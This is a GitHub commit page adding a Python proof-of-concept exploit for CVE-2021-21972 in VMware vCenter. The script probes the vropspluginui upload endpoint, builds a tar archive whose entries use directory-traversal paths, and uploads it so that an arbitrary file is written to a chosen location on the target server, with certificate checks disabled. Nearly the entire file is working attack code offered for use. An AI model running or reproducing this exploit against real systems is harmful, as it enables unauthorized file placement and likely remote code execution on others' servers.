-
Notifications
You must be signed in to change notification settings - Fork 643
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
61 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,61 @@ | ||
| #!/usr/bin/python3 | ||
|
|
||
| import argparse | ||
| import requests | ||
| import tarfile | ||
| import urllib3 | ||
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | ||
|
|
||
| ENDPOINT = '/ui/vropspluginui/rest/services/uploadova' | ||
|
|
||
| def check(ip): | ||
| r = requests.get('https://' + ip + ENDPOINT, verify=False, timeout=30) | ||
| if r.status_code == 405: | ||
| print('[+] ' + ip + ' vulnerable to CVE-2021-21972!') | ||
| return True | ||
| else: | ||
| print('[-] ' + ip + ' not vulnerable to CVE-2021-21972. Response code: ' + str(r.status_code) + '.') | ||
| return False | ||
|
|
||
| def make_traversal_path(path, level=5, os="unix"): | ||
| if os == "win": | ||
| traversal = ".." + "\\" | ||
| fullpath = traversal*level + path | ||
| return fullpath.replace('/', '\\').replace('\\\\', '\\') | ||
| else: | ||
| traversal = ".." + "/" | ||
| fullpath = traversal*level + path | ||
| return fullpath.replace('\\', '/').replace('//', '/') | ||
|
|
||
| def archive(file, path, os): | ||
| tarf = tarfile.open('exploit.tar', 'w') | ||
| fullpath = make_traversal_path(path, level=5, os=os) | ||
| print('[+] Adding ' + file + ' as ' + fullpath + ' to archive') | ||
| tarf.add(file, fullpath) | ||
| tarf.close() | ||
| print('[+] Wrote ' + file + ' to exploit.tar on local filesystem') | ||
|
|
||
| def post(ip): | ||
| r = requests.post('https://' + ip + ENDPOINT, files={'uploadFile':open('exploit.tar', 'rb')}, verify=False, timeout=30) | ||
| if r.status_code == 200 and r.text == 'SUCCESS': | ||
| print('[+] File uploaded successfully') | ||
| else: | ||
| print('[-] File failed to upload the archive. The service may not have permissions for the specified path') | ||
| print('[-] Status Code: ' + str(r.status_code) + ', Response:\n' + r.text) | ||
|
|
||
| if __name__ == "__main__": | ||
| parser = argparse.ArgumentParser() | ||
| parser.add_argument('-t', '--target', help='The IP address of the target', required=True) | ||
| parser.add_argument('-f', '--file', help='The file to tar') | ||
| parser.add_argument('-p', '--path', help='The path to extract the file to on target') | ||
| parser.add_argument('-o', '--operating-system', help='The operating system of the VCSA server') | ||
| args = parser.parse_args() | ||
|
|
||
| vulnerable = check(args.target) | ||
| if vulnerable and (args.file and args.path and args.operating_system): | ||
| archive(args.file, args.path, args.operating_system) | ||
| post(args.target) | ||
|
|
||
|
|
||
|
|
||
|
|